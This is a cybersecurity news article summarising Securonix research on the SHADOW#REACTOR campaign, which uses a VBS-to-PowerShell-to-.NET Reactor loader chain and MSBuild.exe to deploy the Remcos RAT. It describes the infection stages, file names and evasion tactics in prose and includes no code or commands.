Cybersecurity analysts have uncovered a new malware operation known as SHADOW#REACTOR, which uses a stealthy, multi stage infection chain to deploy the Remcos Remote Administration Tool (RAT). The campaign is designed to establish persistent and covert control over compromised Windows systems while evading traditional detection mechanisms.
According to a technical report released by Securonix researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee, the attack relies on a carefully sequenced execution flow. An obfuscated Visual Basic Script is launched using wscript.exe, which then triggers a PowerShell based downloader. This downloader retrieves fragmented, text based payloads from a remote server and reconstructs them entirely in memory.
Evasive Infection Chain and Loader Design
The downloaded fragments are reassembled into encoded loaders and decoded in memory through a .NET Reactor protected assembly. This loader then fetches a remote Remcos configuration file and applies it dynamically. In the final stage, the attackers abuse MSBuild.exe, a legitimate Microsoft binary, to complete execution and launch the Remcos RAT backdoor.
Once deployed, the malware grants attackers full remote access to the infected system, allowing them to execute commands, monitor activity, and maintain long term persistence. Researchers assess the campaign as broad and opportunistic, with targets primarily consisting of enterprise environments and small to medium sized businesses.
Likely Initial Access Broker Activity
While no specific threat actor has been linked to SHADOW#REACTOR, the tactics and tooling align closely with those used by initial access brokers. These actors typically compromise environments and later sell access to other criminal groups for financial gain. There is currently no evidence connecting the campaign to a known advanced persistent threat group.
One of the most notable aspects of this operation is its heavy reliance on intermediate, text only stagers. Combined with in memory PowerShell reconstruction and .NET Reactor protected reflective loading, this approach significantly complicates static analysis and sandbox based detection.
Step by Step Attack Flow
The infection begins when a user executes a malicious Visual Basic Script file, commonly named win64.vbs, likely delivered through social engineering techniques such as phishing links. The script runs via wscript.exe and launches a Base64 encoded PowerShell payload.
This PowerShell component uses System.Net.WebClient to communicate with the same remote server and downloads a text based payload named qpwoe64.txt or qpwoe32.txt, depending on system architecture. The file is saved in the %TEMP% directory.
To ensure reliability, the script continuously checks whether the file exists and meets a predefined size threshold. If the payload is incomplete or corrupted, the script pauses and attempts to re download it. Even if the threshold is not met within a defined timeout window, execution continues rather than terminating, preventing the infection chain from breaking.
Persistence and Execution via Living off the Land Binaries
Once validation is complete, the malware constructs a secondary PowerShell script named jdywa.ps1. This script invokes the .NET Reactor loader, which establishes persistence, retrieves the next stage payload, and performs multiple anti debugging and anti virtual machine checks.
The final execution of Remcos RAT is performed through MSBuild.exe, a trusted Windows binary, allowing the malware to blend into legitimate system activity. Additional wrapper scripts are also dropped to repeatedly re trigger the execution of the original VBS launcher, ensuring continued access.
Securonix researchers note that the overall behavior points to a modular and actively maintained loader framework. The combination of text based intermediates, in memory decoding, .NET Reactor obfuscation, and LOLBin abuse reflects a deliberate strategy to bypass antivirus engines, sandbox environments, and rapid analyst investigation.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
